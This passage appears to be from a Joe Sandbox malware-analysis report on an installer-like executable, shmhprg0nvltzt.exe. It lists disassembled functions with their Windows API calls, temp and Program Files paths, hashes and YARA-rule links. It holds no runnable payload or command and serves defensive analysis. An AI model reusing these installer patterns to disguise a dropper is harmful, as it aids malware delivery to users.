                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                                                                • String ID: Call$N$q
                                                                                                                                                                                                                                • API String ID: 3103080414-2770229300
                                                                                                                                                                                                                                • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                                                                                                                                                                                • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                                • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                • String ID: F
                                                                                                                                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                                                                                                                                                                                • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040498A Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 004049D9
                                                                                                                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00404A03
                                                                                                                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 00404AF1
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,Call), ref: 00404AFD
                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B0F
                                                                                                                                                                                                                                  • Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94
                                                                                                                                                                                                                                  • Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                                                                                                                                                                  • Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                                                                                                                                                                  • Part of subcall function 004067C4: CharNextW.USER32(?,00000000,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                                                                                                                                                                  • Part of subcall function 004067C4: CharPrevW.USER32(?,?,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED
                                                                                                                                                                                                                                  • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                                                                                                                                                                                  • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                                                                                                                                                                                                                                  • Part of subcall function 00404D46: SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                • String ID: A$C:\Users\user\AppData\Local\Temp$Call$q
                                                                                                                                                                                                                                • API String ID: 2624150263-2010749303
                                                                                                                                                                                                                                • Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                                                                                                                                                                                • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00406183 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061C7
                                                                                                                                                                                                                                  • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                                                                                                                                                                  • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004061E4
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00406202
                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004062EB
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2
                                                                                                                                                                                                                                  • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                                                                                                                                  • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                                                                • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                                                                • API String ID: 2171350718-461813615
                                                                                                                                                                                                                                • Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                                                                                                                                                                                                • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040657A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
                                                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,00000000,00000000,00425A20,76F723A0), ref: 004066A8
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,00000000), ref: 00406779
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                                                                                                                                                                • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                • API String ID: 4260037668-2919979080
                                                                                                                                                                                                                                • Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                                                                                                                                                                                                • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00404500 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040451D
                                                                                                                                                                                                                                • GetSysColor.USER32(00000000), ref: 0040455B
                                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00404567
                                                                                                                                                                                                                                • SetBkMode.GDI32(?,?), ref: 00404573
                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 00404586
                                                                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00404596
                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004045B0
                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 004045BA
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                                                                                                                • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                                                                                                                                • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                                                                                                                                                                  • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                                                                • String ID: 9
                                                                                                                                                                                                                                • API String ID: 163830602-2366072709
                                                                                                                                                                                                                                • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                                                                                                                                                                                • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004067C4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                                                                                                                                                                • CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                                                                                                                                                                • CharNextW.USER32(?,00000000,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                                                                                                                                                                • CharPrevW.USER32(?,?,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                                                                                                                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                • API String ID: 589700163-2977677972
                                                                                                                                                                                                                                • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                                                                                                                                • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

